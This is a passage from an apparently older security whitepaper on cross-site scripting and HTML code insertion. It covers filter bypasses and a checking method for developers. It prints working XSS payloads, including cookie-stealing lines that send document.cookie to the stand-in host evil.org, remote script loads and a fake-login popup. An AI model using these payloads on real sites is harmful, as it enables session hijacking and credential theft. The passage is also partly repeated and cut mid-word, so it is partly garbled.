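which supports the reading that only the second routine encodes special
characters.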
Several opportunities present themselves here. To make the site execute the Java
Script alert box for each type, we need to force the <script> tags outside of an
y other HTML tags. Thus, for each type, the following methods will work:
1. ><script>alert('CSS Vulnerable')</script><b a=a
2. a></a><script>alert('CSS Vulnerable')</script>
3. \'><script>alert%28\'CSS Vulnerable\'%29</script><
The result is the following alert box (multiple times):
This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and to provide advice on securing applications against this type of attack.
Code Insertion
The success of this type of attack hinges upon the functionality of the client browser. In HTML, to distinguish displayable text from the interpreted markup language, some characters are treated specially. One of the most common special characters used to define elements within the markup language is the < character, which typically indicates the beginning of an HTML tag. These tags can either affect the formatting of the page or introduce a program that the client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program).
Most web browsers interpret scripts embedded within HTML content by default, so if an attacker successfully injects script content, it will likely be executed by the end user's browser within the context in which it was delivered (e.g. website, HTML help, etc.). Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. The tags most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.
While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag: by inserting the appropriate HTML tag information, an attacker could trick visitors to the site into revealing sensitive information, for instance by modifying the behaviour of an existing form. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisation's online annual accounts or president's statement).
It is important to understand the HTML tags that are most commonly used to carry out code insertion attacks. The following table details the most important attributes of these tags. However, it is important to note that alternative in-line scripting elements, such as javascript:alert('executing script'), may also be used and interpreted by the current generation of web browsers.
HTML Tag    Description
<SCRIPT>    Adds a script that is to be used in the document.
Attributes:
* type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is a recommended replacement for the language attribute.
* language = Identifies the language of the script, such as JavaScript or VBScript.
* src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Netscape only)
Supported by: Netscape, IE 3+, HTML 4, Opera 3+
<OBJECT>    Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object.
Attributes:
* classid = Identifies the class identifier of the object.
* codebase = Identifies the URL of the object's codebase.
* codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
* data = Specifies the URL of the data used for the object.
* name = Specifies the name of the object to be referenced by scripts on the page.
* standby = Specifies the message to display while the object loads.
* type = Specifies the media type for the data.
* usemap = Specifies the imagemap URL to use with the object.
Supported by: Netscape, IE, HTML 4
<APPLET>    Used to place a Java applet on a document. It is deprecated in the HTML 4.0 specification in favour of the <object> tag.
Attributes:
* code = Specifies the class name of the code to be executed (required).
* codebase = The URL from which the code is retrieved.
* name = Names the applet for reference elsewhere on the page.
Supported by: Netscape, IE 3+, HTML 4
<EMBED>     Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <object> tag.
Attributes:
* hidden = Hides the media file or player from view when set to yes.
* name = Specifies the name for the embedded object for later reference within a script.
* pluginspage = Specifies the URL for information on installing the appropriate plug-in.
* src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only)
* code = Specifies the class name of the Java code to be executed. (IE only)
* codebase = Specifies the base URL for the application. (IE only)
* pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only)
* type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only)
Supported by: Netscape, IE 3+, Opera 3+
<FORM>      Indicates the beginning and end of a form.
Attributes:
* action = Specifies the URL of the application that will process the form.
* enctype = Specifies how the values for the form controls are encoded when they are submitted to the server.
* method = Specifies which HTTP method will be used to submit the form data.
* target = Specifies a target window for the results of the form submission to be loaded (_blank, _top, _parent, and _self).
Supported by: All
Malicious Code
An embedded code attack is heavily dependent upon the delivery mechanism. Thus the delivery method often dictates the audience the script will potentially affect.
It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Board Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII and, later, the use of vector drawing languages that permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt a long time ago to rigorously control the content that could be submitted.
An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user-submitted text from a standard POST form. This data was then added to the discussion page, without any further processing. Users often included text formatting tags to bold, italicise or colour their text, giving their message a greater visual impact. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, resulting in the unintentional effect of altering every following message on the page. Now consider the implications for everyone viewing the message if a user were to embed either of the following two code snippets in their posting.
Hello World! <SCRIPT>malicious code</SCRIPT>
Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">
Unfortunately, attackers are finding ever more ingenious methods of encoding their embedded attacks, and consequently many more sites are vulnerable.
Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes the malicious code. The site sends a page back to the browser that includes the value of criteria, which consequently forces the execution of code from the attacker's server. For example:
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A>
In the attack above, one source is inserting code into pages sent by another source.
It should be noted that this attack:
* disguises the link as a link to http://trusted.org,
* can be easily included in an HTML email message,
* does not supply the malicious code inline, but downloads it from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.
This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS).
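As a minimal sketch of the scenario above, the following JavaScript models a search page that echoes criteria back to the browser. The function names and the page template are assumptions made for illustration and are not taken from any real trusted.org code; the entity-encoding variant is one common mitigation, shown only for contrast.

```javascript
// Hypothetical server-side page builders for the search.cgi example.

// Vulnerable: the criteria value is copied into the page verbatim.
function renderResultsNaive(criteria) {
  return "<p>Results for: " + criteria + "</p>";
}

// Assumed mitigation: entity-encode markup characters before echoing.
function encodeForHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function renderResultsEncoded(criteria) {
  return "<p>Results for: " + encodeForHtml(criteria) + "</p>";
}

// The value carried by the disguised link in the example.
const linkCriteria = "<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>";

// The naive page now contains a live <SCRIPT> tag that loads from evil.org.
console.log(renderResultsNaive(linkCriteria));
// The encoded page displays the same characters as inert text.
console.log(renderResultsEncoded(linkCriteria));
```

In the naive output the browser sees a script element that appears to come from the trusted site; in the encoded output the same input is only displayed.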
Cross Site Scripting
A cross-site scripting vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system. "Cross-site" refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim's browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions, which can result not only in cookie theft but also in account hijacking, changing of web application account settings, spreading of a webmail worm, etc.
Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn't necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
The most popular (and devastating) CSS/XSS attack is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A paper by iDefence explains the process in great detail, but it can be quickly summarised as follows:
1. The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session IDs.
2. The attacker finds a CSS vulnerable page on the site, for instance http://trusted.org/account.asp.
3. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.
4. Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker. For instance:
<img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
5. Unknown to the victim, the attacker has now received a copy of their cookie information.
The attacker now visits the web site and, by substituting his cookie information with that of the victim, is now perceived to be the victim by the server application.
Note that Cross-site scripting is commonly referred to as CSS and/or XSS.
Understanding Code Insertion
To date, security professionals have discovered an ever-increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so.
Inline Scripting
http://trusted.org/search.cgi?criteria=<script>code</script>
http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>
http://trusted.org/COM2.IMG%20src="Javascript:alert(document.domain)"
Forced Error Responses
http://trusted.org/<script>code</script>
This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data.
http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the user's browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request.
http://trusted.org/servlet/org.apache.catalina.servlets.WebdavStatus/<script>code</script>
In the example above, when the Tomcat servlet is called with the trailing illegitimate request, an error page is served containing the offending text verbatim.
Non <SCRIPT> Events
" [event]='code'
In many cases it may be possible for an attacker to insert an exploit string, with the above syntax, into an HTML tag that should have looked like:
<A HREF="exploit string">Go</A>
resulting in:
<A HREF="" [event]='code'">Go</A>
Intrinsic events can be attached to almost any tag, for example:
<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>
As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed.
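The quoted-attribute case can be sketched as follows. The link builder and the encoding helper are hypothetical names introduced for this illustration; the point is only that a value written inside HREF="..." must not be able to supply its own closing quote.

```javascript
// Hypothetical link builder that places user input inside a quoted attribute.
function buildLinkNaive(value) {
  return '<A HREF="' + value + '">Go</A>';
}

// Assumed mitigation: encode the quote characters as well as the markup
// characters, so the value cannot terminate the attribute it is written into.
function encodeForAttribute(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function buildLinkEncoded(value) {
  return '<A HREF="' + encodeForAttribute(value) + '">Go</A>';
}

// An exploit string of the form  " [event]='code'
const exploitString = "\" onMouseOver='alert(1)'";

// The leading quote closes HREF, so onMouseOver becomes a real attribute.
console.log(buildLinkNaive(exploitString));
// With the quotes encoded, the whole string stays inside the HREF value.
console.log(buildLinkEncoded(exploitString));
```

Note that no < or > character is needed for this insertion, which is why filters that only look for script tags do not stop it.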
JavaScript Entities
<img src="&{alert('CSS Vulnerable')};">
The special character & is sometimes interpreted as the start of a new JavaScript code segment (entity).
Typical Payload Formatting
<img src="malicious.js">
<script>alert('hacked')</script>
<iframe src="malicious.js">
<script>document.write('<img src="http://evil.org/'+document.cookie+'">')</script>
Insertion Example
Dynamic URL Generation
Consider an application built for running on Microsoft's Internet Information Server (IIS) web server platform. Dynamic content is delivered through IIS's Active Server Pages (ASP).
Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows:
<A HREF="http://trusted.org/search_main.asp?searchstring=SomeString">click-me</A>
and the ASP code required to generate a further query based upon this submitted information is:
<%
// Vulnerable: the query string value is written into the page unencoded.
var BaseUrl = "http://trusted.org/search2.asp?searchagain=";
Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>");
%>
If the attacker were to replace SomeString with their own code, as indicated next:
<a href="http://trusted.org/search_main.asp?SearchString=%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%2Esubmit%3B%27">FooBar</a>
The likely result found in the dynamically generated ASP page will be:
<A HREF="http://trusted.org/search2.asp?searchagain="" onmouseover='ClientForm.action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm.submit;'">click-me</A>
In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attacker's web site.
Bypassing Anti-CSS Filters
A key function of any application filtering process will be the removal of possibly dangerous special characters. However, in many circumstances it may be difficult to filter a large range of these characters due to the application's unique requirements.
Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different ways in which special characters can be encoded.
One of the most popular alternative character representations is HTML escaped encoding (also known as URL or percent-encoding), sometimes mistakenly referred to as Unicode encoding. In this system, the HEX value of the ASCII character is prefixed with the % character.
Char   ;    /    ?    :    @    =    &    <    >    "    #
Code   %3b  %2f  %3f  %3a  %40  %3d  %26  %3c  %3e  %22  %23

Char   {    }    |    \    ^    ~    [    ]    `    %    '
Code   %7b  %7d  %7c  %5c  %5e  %7e  %5b  %5d  %60  %25  %27
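The table can be reproduced mechanically. The following sketch, which assumes plain ASCII input and uses a hypothetical helper name, prefixes the two-digit hexadecimal character code with %.

```javascript
// Escape-encode a single ASCII character as % followed by its hex value.
function escapeEncode(ch) {
  return "%" + ch.charCodeAt(0).toString(16).padStart(2, "0");
}

// The special characters listed in the table above.
const tableChars = ";/?:@=&<>\"#{}|\\^~[]`%'";

for (const ch of tableChars) {
  console.log(ch, escapeEncode(ch));
}
```

Decoding with the built-in decodeURIComponent returns the original character, which is what a web server does before the application sees the value.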
To better understand the processes behind bypassing Anti-CSS filtering mechanisms, a series of detailed examples is provided below.
Inserting Malicious Code
Simple Filtering of < and >
Many applications that implement some kind of content filtering will typically filter out the < and > characters at the client-side. At first glance, this looks like an effective way of ensuring <script> type HTML tags are not possible. Unfortunately, not only is client-side code easy to bypass, in many circumstances the filter can also be defeated using a mix of alternative character representations and other special characters.
Consider a routine that removes the < and > special characters:
document.write(cleanSearchString('<>'));
The attacker now uses an alternative coding for the filtered characters, \x3c and \x3e respectively, and begins their code with ') + to escape out of the routine.
') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'
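The effect can be simulated outside a browser. In this sketch cleanSearchString is a guessed implementation of the filter, and evaluatePageExpression is a hypothetical stand-in for the page: it pastes the submitted text between the quotes of cleanSearchString('...') and evaluates the result, returning what document.write would receive. The trailing + (' on the last payload is an addition made here so that the generated statement stays syntactically valid.

```javascript
// Assumed filter: removes literal angle brackets from a string.
function cleanSearchString(s) {
  return s.replace(/[<>]/g, "");
}

// Stand-in for the browser evaluating the generated page script. The
// submitted text lands inside a JavaScript string literal, exactly as in
//   document.write(cleanSearchString('...'));
function evaluatePageExpression(submitted) {
  const expression = "cleanSearchString('" + submitted + "')";
  return new Function("cleanSearchString", "return " + expression + ";")(cleanSearchString);
}

// 1. Literal tags are removed by the filter.
console.log(evaluatePageExpression("<b>hi</b>"));

// 2. Escapes alone do not help: they are decoded before the filter runs.
console.log(evaluatePageExpression("\\x3cb\\x3e"));

// 3. Closing the string and the call first moves the payload outside the filter.
const breakout =
  "') + '\\x3cscript src=http://evil.org/malicious.js\\x3e\\x3c/script\\x3e' + ('";
console.log(evaluatePageExpression(breakout));
```

The third case shows why both tricks are combined: ') + leaves the filtering routine, and the \x3c and \x3e escapes keep literal angle brackets out of the submitted text.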
Commenting out malicious code
Consider an application that filters content on behalf of its clients by causing any scripting content to be safely commented out. For instance, <script>code</script> is filtered by the application to become:
<COMMENT>

</COMMENT>
Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <comment> filter process. For example, the attacker can send the following code:
<script>
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open('http://evil.org/fakeloginscreen.jsp');">
</script>
After processing by the filter, the following code is embedded in the returned document:
<COMMENT>

</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open('http://evil.org/fakeloginscreen.jsp');">
</COMMENT>
This particular attack was originally designed to bypass the security filtering processes of a large web-mail provider, and would have been embedded in HTML email content. Users viewing the email would automatically be prompted with a fake login screen, making for an easy method of harvesting user names and passwords.
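The weakness of this style of filter can be sketched in JavaScript. The filter below is an assumption: the exact wrapper used by the web-mail provider is not reproduced in this document, so the sketch simply wraps the body of each script element in an HTML comment inside <COMMENT> tags.

```javascript
// Hypothetical filter: neutralise <script> blocks by commenting out their body.
function commentOutScripts(html) {
  return html.replace(
    /<script[^>]*>([\s\S]*?)<\/script>/gi,
    (match, body) => "<COMMENT><!--" + body + "--></COMMENT>"
  );
}

// An ordinary script is wrapped and never runs.
console.log(commentOutScripts("<script>alert(1)</script>"));

// The attacker supplies the closing markers first, so everything after
// them falls outside the comment produced by the filter.
const attack =
  "<script>--></COMMENT>" +
  "<img src=\"http://none\" onerror=\"alert(document.cookie)\">" +
  "</script>";
console.log(commentOutScripts(attack));
```

In the second output the img tag follows a closed comment and a closed COMMENT element, so the browser treats it as live markup and its onerror handler fires when the image fails to load.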
Separate Window Handling
A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window, by adding target=_blank to the HTML <A HREF> tag. This causes any malicious code to be executed in the context of a different DOM.
Unfortunately, in many online email applications it is possible to bypass this protection after analysing the harmless link supplied by the site.
Consider a site that parses a submitted link which, after processing, becomes:
<a href="javascript:" target="_blank">click-me</a>
causing the URL to be opened in a new window.
However, if the attacker constructs his HREF with an unbalanced quote, as follows,
<a href="javascript:..." foo="bar>click-me</a>
it will be interpreted as:
<a href="javascript:..." foo="bar target="_blank">click-me</a>
causing the code to be executed in the same page, under the same DOM, because the added target text is absorbed into the value of the foo attribute.
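A short sketch shows why the unbalanced quote defeats the rewrite. Both functions are hypothetical: forceNewWindow imitates a filter that adds target="_blank" before the first >, and attributeNames is a deliberately simplified attribute reader, not a real HTML parser.

```javascript
// Hypothetical rewriter: add target="_blank" before the first ">" of the link.
function forceNewWindow(anchorHtml) {
  return anchorHtml.replace(">", ' target="_blank">');
}

// Simplified reader: collects names of attributes written as name="value".
function attributeNames(tagHtml) {
  return Array.from(tagHtml.matchAll(/(\w+)="([^"]*)"/g), (m) => m[1]);
}

const harmless = forceNewWindow('<a href="javascript:...">click-me</a>');
console.log(harmless, attributeNames(harmless));

const crafted = forceNewWindow('<a href="javascript:..." foo="bar>click-me</a>');
console.log(crafted, attributeNames(crafted));
```

For the harmless link the reader finds href and target; for the crafted link it finds href and foo, because the inserted target text has been swallowed by the quoted value of foo.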
Escaped JavaScript Entities
In cases where almost all special characters are filtered from user-supplied strings, attackers must encode the entire attack string.
Consider the following URL:
http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL%27%29%7d%3b&apropos=pos2
The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing, in this instance, an unexpected JavaScript alert window to pop up with the text EVIL.
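The reason a fully encoded string slips through is that a filter inspecting the raw request sees only %, digits and letters. The check below is a hypothetical filter written for this sketch; it is meant to show the ordering problem, not to serve as a recommended character list.

```javascript
// Hypothetical filter: flags a value containing common special characters.
function containsSpecialCharacters(value) {
  return /[<>&{}()'";]/.test(value);
}

const rawQueryValue = "%26%7balert%28%27EVIL%27%29%7d%3b";

// Inspecting the value as received: nothing suspicious is found.
console.log(containsSpecialCharacters(rawQueryValue));

// Inspecting after decoding: the JavaScript entity is visible.
const decodedQueryValue = decodeURIComponent(rawQueryValue);
console.log(decodedQueryValue, containsSpecialCharacters(decodedQueryValue));
```

Any filtering therefore has to be applied to the value after all decoding steps have taken place.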
Web Integration
As client web browsers have evolved, they have incorporated an increasingly diverse range of functions. At the same time, many common desktop applications have extended their functionality to replicate or incorporate the functionality of these same browsers. While the security flaw may be HTML injection, and more specifically CSS, the avenues available for a malicious user or attacker to initiate the attack are becoming ever broader. As is already evident, HTML email has become a popular personalised delivery mechanism. Unfortunately, the delivery methods are becoming so diverse that no single security solution is available to prevent the attack. Consider the significance of the following delivery mechanisms.
The Flash! Attack
Flash! is a popular application for displaying animated visual information. It has its own development language (ActionScript) for creating sophisticated interactive menus, animated movies and games. The most popular web browsers often install the interpreter for these files by default and, due to the large number of sites that use the technology, many people will install the interpreter even if it wasn't originally available with their web browser.
ActionScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser.
For instance, instead of:
getURL("http://www.technicalinfo.net")
it is possible to specify scripting code:
getURL("javascript:alert(document.cookie)")
Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script> type tags) and local web browser security settings.
For an attack to be successful, the dangerous Flash! file (typically terminating in a .swf extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for instance:
<EMBED
src="http://evil.org/badflash.swf"
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>
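The getURL() issue comes down to the scheme of the supplied value. As a hedged illustration, any component that accepts a URL-valued parameter could check the scheme before using it. The helper name and the decision to allow only http and https are assumptions of this sketch.

```javascript
// Hypothetical allow-list check for URL-valued parameters.
function isWebUrl(value) {
  let parsed;
  try {
    parsed = new URL(value);
  } catch (err) {
    return false; // not an absolute URL at all
  }
  return parsed.protocol === "http:" || parsed.protocol === "https:";
}

console.log(isWebUrl("http://www.technicalinfo.net"));
console.log(isWebUrl("javascript:alert(document.cookie)"));
```

The URL parser lower-cases the scheme, so mixed-case spellings such as JavaScript: are rejected by the same comparison.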
The Impact
The impact of malicious code insertion is often difficult to quantify and will change as new functionality or interactions are incorporated into both web servers and client browsers. Already, users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail or instant messages, or any other application capable of displaying HTML content (e.g. Microsoft Help). For this reason, a series of examples best illustrates the diversity and impact of potential threats.
Consider the following examples:
* An attacker often has access to the document retrieved, since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.
* An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.
* An attacker may be able to poison the site's persistent cookies, thus modifying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and executed each time the site dynamically generates page content without the correct processing.
* An attacker may be able to cause a hidden window to start on the client machine and use this to key-log all browser interaction of the victim. Should the victim later visit sites requiring authentication, the attacker could harvest this information.
* CSS type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attacker's code unintentionally. If the attacker references document components on a remote host, the victim's client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on an SSL-capable web server.
* An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.
* An attacker may be able to bypass policies that prevent the victim's browser from executing scripts. For example, Internet Explorer security zones may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.
* An attacker may use a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may cause the execution of the malicious code on the help-desk system.
* Even if the victim's web browser does not support scripting, an attacker may still be able to alter the content of the page, affecting its appearance, behaviour or normal operation.
To date the most popular application content to be targeted by attackers has been web pages that:
* Return results based upon user input to search engines,
* Process credit card information,
* Store user-supplied content in databases and cookies for later retrieval.
Vulnerability Checking
Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has been frequently used in the past.
1. For each visible input field (these may be located in an HTML form, or represented in the URL as variable=), try the most obvious scripting formats:
<script>alert('CSS Vulnerable')</script>
<img csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable')};
In any case, should an alert message pop up with the text CSS Vulnerable, the application component is vulnerable, specifically the input field just checked.
2. If any of the above scripting checks causes the HTML page to display incorrectly, the application component may still be vulnerable.
3. For each visible variable, submit/substitute the following string:
'';!--"<CSS_Check>=&{()} (Note that the string begins with two single quotes)
On the resultant page, search for the string <CSS_Check>. If you discover <CSS_Check>, it is quite probable that the application component is vulnerable. However, if the angle brackets around CSS_Check have been replaced by something similar to &lt;CSS_Check&gt;, then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload.
4. Having located the word CSS_Check, verify what (if any) other characters have been altered or filtered from the original string '';!--"<CSS_Check>=&{()}. Depending upon the filtered characters, the application component may still be vulnerable.
5. Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above) then there is a high probability that the application component is vulnerable.
6. Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Security group or WebProxy by @stake. These proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application.
7. In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data.
It is a simple process of turning a POST into a GET submission. If the application component fails to respond to the GET the same way as it did for the POST submission, it is probably not vulnerable to a URL-based inline scripting attack.
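Parts of the checking process above lend themselves to small helper routines. The following is a rough sketch under stated assumptions: the function names are invented for this example, the response body is assumed to be available as a string, and the classification is deliberately crude.

```javascript
// Probe string from step 3 (it begins with two single quotes).
const PROBE = "'';!--\"<CSS_Check>=&{()}";

// Step 7: express a form submission as a GET request.
// `action` and `fields` are placeholders for the form's target and inputs.
function toGetUrl(action, fields) {
  const url = new URL(action);
  for (const [name, value] of Object.entries(fields)) {
    url.searchParams.set(name, value);
  }
  return url.toString();
}

// Step 3: classify how the marker came back in the response body.
function classifyReflection(body) {
  if (body.includes("<CSS_Check>")) return "literal";
  if (body.includes("&lt;CSS_Check&gt;")) return "entity-encoded";
  if (body.includes("CSS_Check")) return "altered";
  return "absent";
}

// Step 4: list the probe's special characters that no longer appear
// anywhere in the reflected fragment.
function filteredCharacters(reflected) {
  const specials = Array.from(new Set(PROBE.replace("CSS_Check", "")));
  return specials.filter((ch) => !reflected.includes(ch));
}

console.log(toGetUrl("http://trusted.org/search.cgi", { q: PROBE }));
console.log(classifyReflection("<p>You searched for " + PROBE + "</p>"));
console.log(filteredCharacters("'';!--\"CSS_Check=&{()}"));
```

A result of "literal" corresponds to the probable vulnerability described in step 3, while the list returned by filteredCharacters feeds the judgement called for in steps 4 and 5.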
Putting It All Together
To bring together many of the ideas and processes discussed earlier in this docu
ment, an example can be used to bring it all together. In this example, the anon
ymous site has a search engine that responds to client data submissions. Normall
y the site would look like this:
In our first test, we try submitting our first test string <script>alert('CSS Vu
lnerable')</script>, and receive the following response:
Notice the strange response in the Your Search box on the left. Zoomed in below.
Taking a closer look at the content source, we notice that our sample code appea
rs 21 times in the document, in various formats.
It appears 10 times in a format similar to:
<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/
anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')
</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>
9 times in a format similar to:
<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript
%3E&pager.offset=10">2</a>
And twice in the format similar to:
document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\
"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');
Evidently, there are three different server-side routines for processing client
search data.
1. In the first type (ad.uk.doubleclick.net format), it appears that the
processing routine converts characters to lower case and changes white space to
the underscore (_).
2. The second type (href=) converts special characters into their
escape-encoded formats, and white space into the + character.
3. The third type (document.writeln) places the complete string, unmodified,
within a document.writeln JavaScript routine.
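The three transformations listed above can be reproduced in Python to predict how a test string will look in the returned page and to count each form in the page source. This is a sketch under assumptions: the function names are hypothetical, the transformations are inferred only from the samples shown above, and the sample page is a cut-down stand-in for the real response.

```python
from urllib.parse import quote_plus


def reflection_variants(probe: str) -> dict:
    """Return the three forms in which the site appears to echo the input."""
    return {
        # Type 1: lower-cased, white space replaced by underscores.
        "lowercased_underscored": probe.lower().replace(" ", "_"),
        # Type 2: special characters percent-encoded, spaces turned into '+'.
        "url_encoded": quote_plus(probe),
        # Type 3: echoed back without modification.
        "verbatim": probe,
    }


def count_reflections(page_source: str, probe: str) -> dict:
    """Count how often each variant of the probe occurs in the page source."""
    variants = reflection_variants(probe)
    return {name: page_source.count(form) for name, form in variants.items()}


probe = "<script>alert('CSS Vulnerable')</script>"
variants = reflection_variants(probe)

# Cut-down stand-in for the returned page: one occurrence of each form.
sample_page = (
    "kw=" + variants["lowercased_underscored"] + ";pos=top\n"
    '<a href="Search?q=' + variants["url_encoded"] + '&pager.offset=10">2</a>\n'
    "VALUE='" + variants["verbatim"] + "'\n"
)
counts = count_reflections(sample_page, probe)
print(counts)
```

The counts only stay separate when the probe contains upper-case letters or spaces, as the test string here does; an all-lower-case probe with no spaces would make the first and third forms identical.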
Several opportunities present themselves here. To make the site execute the
JavaScript alert box for each type, we need to force the <script> tags outside
of any other HTML tags. Thus, for each type, the following methods will work:
1. ><script>alert('CSS Vulnerable')</script><b a=a
2. a></a><script>alert('CSS Vulnerable')</script>
3. \'><script>alert%28\'CSS Vulnerable\'%29</script><
The result is the following alert box (multiple times):
However, for this example, we shall focus on the last type (document.writeln).
Since it is possible to inject code into the HTML page returned by the anonymous
